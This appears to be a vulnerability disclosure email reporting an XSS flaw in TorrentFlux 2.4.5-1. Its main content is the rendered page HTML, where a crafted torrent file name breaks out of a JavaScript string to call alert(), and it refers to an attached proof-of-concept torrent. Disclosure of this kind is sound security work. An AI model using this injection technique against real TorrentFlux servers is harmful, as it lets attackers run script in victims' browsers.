Package: torrentflux

Version: 2.4.5-1

 

The XSS that can be triggered by an unauthenticated attacker. A malicious
torrent file such as the POC attached can be crafted and shared by an
attacker. Upon starting the download from Torrentflux, some of the file
contents are pasted without output encoding into a script section,
triggering the XSS. An alternate vector (authenticated) is for an attacker
to upload the torrent file to his own account and subsequently share a link
the torrent's details (
<http://www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_201
3.12.torrent>
www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_2013.12.tor
rent).

 

</td></tr></table><br><div align="left" id="BodyLayer" name="BodyLayer"
style="border: thin solid #000000; position:relative; width:740; height:500;
padding-left: 5px; padding-right: 5px; z-index:1; overflow: scroll;
visibility: visible"><link rel="StyleSheet" href="dtree.css" type="text/css"
/><script type="text/javascript" src="dtree.js"></script><table><tr><tr><td
width="110">Metainfo
File:</td><td>pclinuxos_kde_2013.12.torrent</td></tr><tr><td>Directory
Name:</td><td>pclinuxos-kde-2013.12</td></tr><tr><td>Announce URL:
<URL:%3c/td%3e%3ctd%3ehttp://linuxtracker.org:2710/0000000000000000000000000
0000000/announce%3c/td%3e%3c/tr%3e%3ctr%3e%3ctd>
</td><td>http://linuxtracker.org:2710/00000000000000000000000000000000/annou
nce</td></tr><tr><td
valign="top">Comment:</td><td>pclinuxos-kde-2013.12</td></tr><tr><td>Created
:</td><td>December 4, 2013, 12:37 pm</td></tr><tr><td>Torrent
Size:</td><td>1698693120 (1.58 GB)</td></tr><tr><td>Chunk
size:</td><td>2097152 (2 MB)</td></tr><tr><td>Selected size:</td><td
id="sel">0</td></tr></table><br>

<form name="priority" action="index.php" method="POST" ><input type="hidden"
name="torrent" value="pclinuxos_kde_2013.12.torrent" ><input type="hidden"
name="setPriorityOnly" value="true" ><script type="text/javascript">

var sel = 0;

d = new dTree('d');

d.add(4,-1,"/",-1,0);

d.add(0,4,"kde-2013.12.jpg (78175)",-1,78175);

d.add(1,4,"pclinuxos-kde-2013.12.iso (1697839104)",-1,1697839104);

d.add(2,4,"pclinuxos-kde-2013.12.md5sum (60)",-1,60);

d.add(3,4,"X");alert('X');//pg (181733)",-1,181733);

document.write(d);

sel = getSizes();

drawSel();

 

Please find attached the full proof of concept torrent file.

 

--

Nicolas Guigo

Senior Security Engineer

iSEC Partners (NCC GROUP)

(206) 948-3687

9C80 28B2 F016 4DA4 24C9  D1D7 129C FDF6 0CDC B828

 

Attachment: pclinuxos-kde-2013.12.torrent
Description: application/bittorrent

Attachment: smime.p7s
Description: S/MIME cryptographic signature

Reply via email to